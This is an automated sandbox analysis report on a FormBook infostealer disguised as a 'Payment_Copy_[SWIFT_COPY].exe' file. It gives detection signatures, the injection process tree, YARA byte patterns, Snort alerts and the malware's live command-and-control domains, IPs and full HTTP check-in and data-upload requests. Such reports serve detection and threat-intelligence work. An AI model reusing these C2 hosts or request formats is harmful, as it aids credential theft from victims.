Windows Analysis Report
Payment_Copy_[SWIFT_COPY].exe

Overview

General Information

Sample name:Payment_Copy_[SWIFT_COPY].exe
Analysis ID:1355380
MD5:1827b46843b0cf4502a0c0395914842d
SHA1:4af6143d665e11ef138534c1f803ec7531a07d4d
SHA256:50a40c6d5d6f716a1af1ff170aa99c4c0a21271995d5d14817f9955aabd6aa67
Tags:exe
Infos:

Detection

FormBook, NSISDropper
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected FormBook
Yara detected NSISDropper
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Queues an APC in another process (thread injection)
Sample has a suspicious name (potential lure to open the executable)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • Payment_Copy_[SWIFT_COPY].exe (PID: 7464 cmdline: C:\Users\user\Desktop\Payment_Copy_[SWIFT_COPY].exe MD5: 1827B46843B0CF4502A0C0395914842D)
    • btpqr.exe (PID: 7532 cmdline: "C:\Users\user\AppData\Local\Temp\btpqr.exe" MD5: 51D987CA1642C555FB00D10AA35F8348)
      • conhost.exe (PID: 7540 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • btpqr.exe (PID: 7592 cmdline: C:\Users\user\AppData\Local\Temp\btpqr.exe MD5: 51D987CA1642C555FB00D10AA35F8348)
        • mNtjNwEeCHVoSqPJEzBvhXy.exe (PID: 6988 cmdline: "C:\Program Files (x86)\McTNxKnwAlvgWjqnvvTHBgGNyCTPBthmMngIbeAgOsSqvIKrVGCijUGIhHwnIrNzNgBXo\mNtjNwEeCHVoSqPJEzBvhXy.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • typeperf.exe (PID: 7680 cmdline: C:\Windows\SysWOW64\typeperf.exe MD5: 93925D4F55465CFC73C4CDF7F8B1F375)
            • mNtjNwEeCHVoSqPJEzBvhXy.exe (PID: 6992 cmdline: "C:\Program Files (x86)\McTNxKnwAlvgWjqnvvTHBgGNyCTPBthmMngIbeAgOsSqvIKrVGCijUGIhHwnIrNzNgBXo\mNtjNwEeCHVoSqPJEzBvhXy.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
            • firefox.exe (PID: 8032 cmdline: C:\Program Files\Mozilla Firefox\Firefox.exe MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000005.00000002.3839294519.0000000005020000.00000040.00000001.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000005.00000002.3839294519.0000000005020000.00000040.00000001.00040000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x31244:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x1d493:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000008.00000002.3841079742.0000000004C50000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000008.00000002.3841079742.0000000004C50000.00000040.80000000.00040000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x574b0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x436ff:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000006.00000002.3839355049.0000000000BC0000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

Source | Rule | Description | Author | Strings
4.2.btpqr.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
4.2.btpqr.exe.400000.0.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2a033:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x16282:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
4.2.btpqr.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
4.2.btpqr.exe.400000.0.raw.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2ae33:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x17082:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

No Sigma rule has matched

Timestamp | SID | Source IP | Source Port | Destination IP | Destination Port | Protocol | Classtype
12/07/23-13:45:53.892265 | 2855465 | 192.168.2.8 | 49756 | 144.217.103.3 | 80 | TCP | A Network Trojan was detected
12/07/23-13:43:25.108484 | 2855465 | 192.168.2.8 | 49720 | 69.57.161.215 | 80 | TCP | A Network Trojan was detected
12/07/23-13:44:20.591294 | 2855465 | 192.168.2.8 | 49732 | 64.190.62.22 | 80 | TCP | A Network Trojan was detected
12/07/23-13:43:07.624786 | 2855465 | 192.168.2.8 | 49716 | 173.231.241.132 | 80 | TCP | A Network Trojan was detected
12/07/23-13:45:31.302057 | 2855465 | 192.168.2.8 | 49752 | 208.91.197.27 | 80 | TCP | A Network Trojan was detected
12/07/23-13:44:49.247971 | 2855465 | 192.168.2.8 | 49740 | 162.240.81.18 | 80 | TCP | A Network Trojan was detected
12/07/23-13:42:23.852123 | 2855465 | 192.168.2.8 | 49707 | 84.32.84.32 | 80 | TCP | A Network Trojan was detected
12/07/23-13:44:05.771412 | 2855465 | 192.168.2.8 | 49728 | 217.144.107.2 | 80 | TCP | A Network Trojan was detected
12/07/23-13:45:17.103098 | 2855465 | 192.168.2.8 | 49748 | 84.32.84.32 | 80 | TCP | A Network Trojan was detected
12/07/23-13:45:02.926842 | 2855465 | 192.168.2.8 | 49744 | 68.178.195.71 | 80 | TCP | A Network Trojan was detected
12/07/23-13:43:39.597890 | 2855465 | 192.168.2.8 | 49724 | 194.58.112.174 | 80 | TCP | A Network Trojan was detected
12/07/23-13:44:35.378384 | 2855465 | 192.168.2.8 | 49736 | 207.244.126.150 | 80 | TCP | A Network Trojan was detected
12/07/23-13:42:53.053398 | 2855465 | 192.168.2.8 | 49711 | 103.210.56.141 | 80 | TCP | A Network Trojan was detected

            AV Detection

            Source: http://porousworld.com/m858/?w6i=ADXH7n8hwvbLKF6&nRRpS=xSDcG6j Avira URL Cloud: Label: malware
            Source: http://www.cjjmobbbshhhu.shop/m858/?nRRpS=VXEesAUKk48GI7/v/F/vk/2J7KfCFYqlfqdzSz80FcScnenugkkRQu/gNtJifjh8nwe2JaaLs5Szx6+RWLiYtzUoBAQbExEboA==&w6i=ADXH7n8hwvbLKF6 Avira URL Cloud: Label: malware
            Source: http://www.cjjmobbbshhhu.shop/m858/ Avira URL Cloud: Label: malware
            Source: http://www.sorenad.com/m858/ Avira URL Cloud: Label: malware
            Source: http://www.lets-room.online/m858/ Avira URL Cloud: Label: malware
            Source: http://www.speedbikesglobal.com/m858/ Avira URL Cloud: Label: malware
            Source: http://www.porousworld.com/m858/ Avira URL Cloud: Label: malware
            Source: https://rytrk.com/track. Avira URL Cloud: Label: malware
            Source: http://www.belaflorloja.online/m858/ Avira URL Cloud: Label: malware
            Source: http://www.ozzventures.shop/m858/?w6i=ADXH7n8hwvbLKF6&nRRpS=E3d5DyrEcfJbX1PJB/KGYac5KRSYq3LrneiR+hvnGmPole79cfvMffiwEvZVyE+NwNCm4kMx2S50UNzNVB069nu2XDEJbhHAtQ== Avira URL Cloud: Label: malware
            Source: http://sorenad.com/m858/?w6i=ADXH7n8hwvbLKF6&nRRpS=BJQpRkiFIWGAbNjUP1SoKh8XQLkPvbdX4RB0SOc4uF4dZoLmD Avira URL Cloud: Label: malware
            Source: https://rytrk.com Avira URL Cloud: Label: malware
            Source: http://www.fortunetravelsltd.com/m858/?nRRpS=ZTmxX8apPfF8tkROuhCldKUdm000Pni379NFYx1SML9Ouafr/VkVuzz6gSxjw9bsMzi4V9YgtsvXh5Nq9d6FGv9KJFWM1d64+w==&w6i=ADXH7n8hwvbLKF6 Avira URL Cloud: Label: malware
            Source: http://fortunetravelsltd.com/m858/?nRRpS=ZTmxX8apPfF8tkROuhCldKUdm000Pni379NFYx1SML9Ouafr/VkVuzz6gSx Avira URL Cloud: Label: malware
            Source: http://www.fortunetravelsltd.com/m858/ Avira URL Cloud: Label: malware
            Source: http://www.medical-loan24.live/m858/ Avira URL Cloud: Label: malware
            Source: http://www.greenharbor.info/m858/ Avira URL Cloud: Label: malware
            Source: http://www.sorenad.com/m858/?w6i=ADXH7n8hwvbLKF6&nRRpS=BJQpRkiFIWGAbNjUP1SoKh8XQLkPvbdX4RB0SOc4uF4dZoLmD8FJjJTNUnrI50PFHD/luRytaX7y+uiX625dNPSr5MT6J+IM8w== Avira URL Cloud: Label: malware
            Source: http://www.greenharbor.info/m858/?nRRpS=l3PhQIcXSIPbTWu7p/uiREsJUVtNOEFcSOOLMhvnuN6H7BalBQjl+86I6Nr3Qdue789gEwulMvGUQuhGePzt1TzPXk8Fubw2qA==&w6i=ADXH7n8hwvbLKF6 Avira URL Cloud: Label: malware
            Source: http://www.belaflorloja.online/m858/?nRRpS=7ouShKyUNVA5Yjh6oktqXavps0HIih1xZvCLkyS5t8G4GMV8fEbeekSmji8tZe+tjjZfsA6F4HW6RYQ7SobZsKbvkZ0uY+Z5mQ==&w6i=ADXH7n8hwvbLKF6 Avira URL Cloud: Label: malware
            Source: http://www.speedbikesglobal.com/m858/?w6i=ADXH7n8hwvbLKF6&nRRpS=89rK36yXGQSz/ZuNhGBEnsWtjb41/X7NemxUOJ39n9Wf5fwkS2xU1yd0FUAiE8JtPib6/UyBojBD74+XNjIiyM5CO9qwuDsBag== Avira URL Cloud: Label: malware
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exe ReversingLabs: Detection: 24%
            Source: Payment_Copy_[SWIFT_COPY].exe ReversingLabs: Detection: 29%
            Source: Yara match File source: 4.2.btpqr.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match File source: 4.2.btpqr.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 00000005.00000002.3839294519.0000000005020000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000008.00000002.3841079742.0000000004C50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000006.00000002.3839355049.0000000000BC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000006.00000002.3839288746.0000000000B80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000004.00000002.1526993010.0000000000A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000004.00000002.1527458942.0000000003670000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000006.00000002.3837846912.00000000006E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000004.00000002.1526694657.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exe Joe Sandbox ML: detected
            Source: Payment_Copy_[SWIFT_COPY].exe Joe Sandbox ML: detected
            Source: Payment_Copy_[SWIFT_COPY].exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: Binary string: firefox.pdbP source: typeperf.exe, 00000006.00000003.1715571233.0000000007954000.00000004.00000020.00020000.00000000.sdmp, typeperf.exe, 00000006.00000003.1766828555.0000000007A0B000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: mNtjNwEeCHVoSqPJEzBvhXy.exe, 00000005.00000000.1446184640.000000000078E000.00000002.00000001.01000000.00000005.sdmp, mNtjNwEeCHVoSqPJEzBvhXy.exe, 00000008.00000000.1580578250.000000000078E000.00000002.00000001.01000000.00000005.sdmp
            Source: Binary string: typeperf.pdb source: btpqr.exe, 00000004.00000002.1526842326.00000000006C7000.00000004.00000020.00020000.00000000.sdmp, mNtjNwEeCHVoSqPJEzBvhXy.exe, 00000005.00000002.3838573363.0000000000C4E000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdbUGP source: btpqr.exe, 00000002.00000003.1372381572.000000001D0B0000.00000004.00001000.00020000.00000000.sdmp, btpqr.exe, 00000002.00000003.1373122144.000000001D250000.00000004.00001000.00020000.00000000.sdmp, btpqr.exe, 00000004.00000002.1527020260.0000000000CBE000.00000040.00001000.00020000.00000000.sdmp, btpqr.exe, 00000004.00000003.1444358951.000000000097A000.00000004.00000020.00020000.00000000.sdmp, btpqr.exe, 00000004.00000003.1442583872.00000000007CF000.00000004.00000020.00020000.00000000.sdmp, btpqr.exe, 00000004.00000002.1527020260.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, typeperf.exe, 00000006.00000002.3839683325.000000000315E000.00000040.00001000.00020000.00000000.sdmp, typeperf.exe, 00000006.00000003.1526329092.0000000000B87000.00000004.00000020.00020000.00000000.sdmp, typeperf.exe, 00000006.00000002.3839683325.0000000002FC0000.00000040.00001000.00020000.00000000.sdmp, typeperf.exe, 00000006.00000003.1528531756.0000000002E15000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: btpqr.exe, btpqr.exe, 00000004.00000002.1527020260.0000000000CBE000.00000040.00001000.00020000.00000000.sdmp, btpqr.exe, 00000004.00000003.1444358951.000000000097A000.00000004.00000020.00020000.00000000.sdmp, btpqr.exe, 00000004.00000003.1442583872.00000000007CF000.00000004.00000020.00020000.00000000.sdmp, btpqr.exe, 00000004.00000002.1527020260.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, typeperf.exe, typeperf.exe, 00000006.00000002.3839683325.000000000315E000.00000040.00001000.00020000.00000000.sdmp, typeperf.exe, 00000006.00000003.1526329092.0000000000B87000.00000004.00000020.00020000.00000000.sdmp, typeperf.exe, 00000006.00000002.3839683325.0000000002FC0000.00000040.00001000.00020000.00000000.sdmp, typeperf.exe, 00000006.00000003.1528531756.0000000002E15000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: typeperf.pdbGCTL source: btpqr.exe, 00000004.00000002.1526842326.00000000006C7000.00000004.00000020.00020000.00000000.sdmp, mNtjNwEeCHVoSqPJEzBvhXy.exe, 00000005.00000002.3838573363.0000000000C4E000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: firefox.pdb source: typeperf.exe, 00000006.00000003.1715571233.0000000007954000.00000004.00000020.00020000.00000000.sdmp, typeperf.exe, 00000006.00000003.1766828555.0000000007A0B000.00000004.00000020.00020000.00000000.sdmp
            Source: C:\Users\user\Desktop\Payment_Copy_[SWIFT_COPY].exe Code function: 0_2_00405EC2 FindFirstFileA,FindClose, 0_2_00405EC2
            Source: C:\Users\user\Desktop\Payment_Copy_[SWIFT_COPY].exe Code function: 0_2_004054EC DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA, 0_2_004054EC
            Source: C:\Users\user\Desktop\Payment_Copy_[SWIFT_COPY].exe Code function: 0_2_00402671 FindFirstFileA, 0_2_00402671
            Source: C:\Windows\SysWOW64\typeperf.exe Code function: 6_2_006FC010 FindFirstFileW,FindNextFileW,FindClose, 6_2_006FC010
            Source: C:\Windows\SysWOW64\typeperf.exe Code function: 4x nop then pop edi 6_2_006F1810
            Source: C:\Windows\SysWOW64\typeperf.exe Code function: 4x nop then xor eax, eax 6_2_006E99A0
            Source: C:\Windows\SysWOW64\typeperf.exe Code function: 4x nop then pop edi 6_2_006EE0C7

            Networking

            Source: Traffic Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.8:49707 -> 84.32.84.32:80
            Source: Traffic Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.8:49711 -> 103.210.56.141:80
            Source: Traffic Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.8:49716 -> 173.231.241.132:80
            Source: Traffic Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.8:49720 -> 69.57.161.215:80
            Source: Traffic Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.8:49724 -> 194.58.112.174:80
            Source: Traffic Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.8:49728 -> 217.144.107.2:80
            Source: Traffic Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.8:49732 -> 64.190.62.22:80
            Source: Traffic Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.8:49736 -> 207.244.126.150:80
            Source: Traffic Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.8:49740 -> 162.240.81.18:80
            Source: Traffic Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.8:49744 -> 68.178.195.71:80
            Source: Traffic Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.8:49748 -> 84.32.84.32:80
            Source: Traffic Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.8:49752 -> 208.91.197.27:80
            Source: Traffic Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.8:49756 -> 144.217.103.3:80
            Source: Joe Sandbox View IP Address: 162.240.81.18
            Source: Joe Sandbox View IP Address: 207.244.126.150
            Source: Joe Sandbox View ASN Name: UNIFIEDLAYER-AS-1US
            Source: Joe Sandbox View ASN Name: OVHFR
            Source: Joe Sandbox View ASN Name: LEASEWEB-USA-WDCUS
            Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /m858/?w6i=ADXH7n8hwvbLKF6&nRRpS=E3d5DyrEcfJbX1PJB/KGYac5KRSYq3LrneiR+hvnGmPole79cfvMffiwEvZVyE+NwNCm4kMx2S50UNzNVB069nu2XDEJbhHAtQ== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.ozzventures.shopConnection: closeUser-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2339 Mobile Safari/537.35+
            Source: global trafficHTTP traffic detected: GET /m858/?nRRpS=ZTmxX8apPfF8tkROuhCldKUdm000Pni379NFYx1SML9Ouafr/VkVuzz6gSxjw9bsMzi4V9YgtsvXh5Nq9d6FGv9KJFWM1d64+w==&w6i=ADXH7n8hwvbLKF6 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.fortunetravelsltd.comConnection: closeUser-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2339 Mobile Safari/537.35+
            Source: global trafficHTTP traffic detected: GET /m858/?w6i=ADXH7n8hwvbLKF6&nRRpS=xSDcG6j+Ey2rPqhzwDdzjJVnVNgkT4rk7B/VgGxpF9KJHhiy72u20ZI8z6z+NNUSjVU02PDtrOX7gmvolmuvKlLpV/QRDbvCOg== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.porousworld.comConnection: closeUser-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2339 Mobile Safari/537.35+
            Source: global trafficHTTP traffic detected: GET /m858/?nRRpS=l3PhQIcXSIPbTWu7p/uiREsJUVtNOEFcSOOLMhvnuN6H7BalBQjl+86I6Nr3Qdue789gEwulMvGUQuhGePzt1TzPXk8Fubw2qA==&w6i=ADXH7n8hwvbLKF6 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.greenharbor.infoConnection: closeUser-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2339 Mobile Safari/537.35+
            Source: global trafficHTTP traffic detected: GET /m858/?w6i=ADXH7n8hwvbLKF6&nRRpS=OT9XPYCRU0j98Hg/1uDBlXaBM2XXKmT/I6iFF8QONKz/+dd2eTQvqRBLoPpbyNuYQnsLqtRbnM1ZEfE8nLSuVudurqNICOu10w== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.lets-room.onlineConnection: closeUser-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2339 Mobile Safari/537.35+
            Source: global trafficHTTP traffic detected: GET /m858/?w6i=ADXH7n8hwvbLKF6&nRRpS=BJQpRkiFIWGAbNjUP1SoKh8XQLkPvbdX4RB0SOc4uF4dZoLmD8FJjJTNUnrI50PFHD/luRytaX7y+uiX625dNPSr5MT6J+IM8w== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.sorenad.comConnection: closeUser-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2339 Mobile Safari/537.35+
            Source: global trafficHTTP traffic detected: GET /m858/?nRRpS=IsVLP75BXPV29irb7QUBT0f93P2nzsiWNaG7Z6nH6v/C9T4Z/rVV4+geNHA05yDya3IUff47iHu4NOYvgxXZw665HDhGdi01yA==&w6i=ADXH7n8hwvbLKF6 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.medical-loan24.liveConnection: closeUser-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2339 Mobile Safari/537.35+
            Source: global trafficHTTP traffic detected: GET /m858/?w6i=ADXH7n8hwvbLKF6&nRRpS=89rK36yXGQSz/ZuNhGBEnsWtjb41/X7NemxUOJ39n9Wf5fwkS2xU1yd0FUAiE8JtPib6/UyBojBD74+XNjIiyM5CO9qwuDsBag== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.speedbikesglobal.comConnection: closeUser-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2339 Mobile Safari/537.35+
            Source: global trafficHTTP traffic detected: GET /m858/?nRRpS=7ouShKyUNVA5Yjh6oktqXavps0HIih1xZvCLkyS5t8G4GMV8fEbeekSmji8tZe+tjjZfsA6F4HW6RYQ7SobZsKbvkZ0uY+Z5mQ==&w6i=ADXH7n8hwvbLKF6 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.belaflorloja.onlineConnection: closeUser-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2339 Mobile Safari/537.35+
            Source: global trafficHTTP traffic detected: GET /m858/?w6i=ADXH7n8hwvbLKF6&nRRpS=YaKeKM0UqinIxXqyt1dkMasU/gJKxJDaurUM7ZyBp3QsCSEIlQr7ZxZGtQx938wNB79Up+t5frQyoMoLXF0pXDVrMpxqlwTFbA== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.blessingstation.orgConnection: closeUser-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2339 Mobile Safari/537.35+
            Source: global trafficHTTP traffic detected: GET /m858/?nRRpS=VXEesAUKk48GI7/v/F/vk/2J7KfCFYqlfqdzSz80FcScnenugkkRQu/gNtJifjh8nwe2JaaLs5Szx6+RWLiYtzUoBAQbExEboA==&w6i=ADXH7n8hwvbLKF6 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.cjjmobbbshhhu.shopConnection: closeUser-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2339 Mobile Safari/537.35+
            Source: global trafficHTTP traffic detected: GET /m858/?w6i=ADXH7n8hwvbLKF6&nRRpS=unslu3ANnB0jwEgO8dBJ1wGsM1BVB71C8A+lB2lk4lRhZ2GNTPRbQ9k43BlJiddJ5udbRNs+X5XglvYJR+tWoycotxYusBU4lA== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.hillcresthealth.onlineConnection: closeUser-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2339 Mobile Safari/537.35+
            Source: global trafficHTTP traffic detected: GET /m858/?w6i=ADXH7n8hwvbLKF6&nRRpS=vUVAFHoFovduHd4/DKwXed3af3ePb0vry6dcW+l5/zrb0ZZNrBa0Shr1AhFt6JSAxzoXU5EndMSNZsLwoEVPEHAIn6yNHix56w== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.hmoatl.comConnection: closeUser-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2339 Mobile Safari/537.35+
            Source: unknownDNS traffic detected: queries for: www.ozzventures.shop
            Source: unknownHTTP traffic detected: POST /m858/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflate, brHost: www.fortunetravelsltd.comOrigin: http://www.fortunetravelsltd.comReferer: http://www.fortunetravelsltd.com/m858/Content-Length: 186Connection: closeCache-Control: no-cacheContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2339 Mobile Safari/537.35+Data Raw: 6e 52 52 70 53 3d 55 52 4f 52 55 4c 4f 6c 58 72 42 39 6a 44 74 37 6c 43 65 47 53 4e 67 31 77 31 6f 31 45 52 32 79 39 50 4a 46 4f 55 68 72 41 75 6c 71 69 71 37 71 70 51 4d 58 67 56 32 37 6d 69 31 44 32 61 7a 35 59 77 4b 57 64 66 4e 72 75 75 69 50 68 36 4a 42 35 4e 50 43 42 4d 51 77 50 31 65 76 6a 61 53 53 6a 73 42 32 6f 48 55 78 43 54 32 6a 36 4f 5a 4f 43 65 76 59 2b 77 62 78 2b 2b 47 66 47 69 59 2f 4c 64 46 77 48 45 5a 42 50 38 54 30 34 4b 4f 78 79 36 54 44 51 53 4b 45 38 6c 71 33 41 46 32 74 59 69 72 32 4a 61 2f 35 48 2f 45 30 4f 68 58 4e 45 51 3d 3d Data Ascii: nRRpS=URORULOlXrB9jDt7lCeGSNg1w1o1ER2y9PJFOUhrAulqiq7qpQMXgV27mi1D2az5YwKWdfNruuiPh6JB5NPCBMQwP1evjaSSjsB2oHUxCT2j6OZOCevY+wbx++GfGiY/LdFwHEZBP8T04KOxy6TDQSKE8lq3AF2tYir2Ja/5H/E0OhXNEQ==
            Source: global traffic
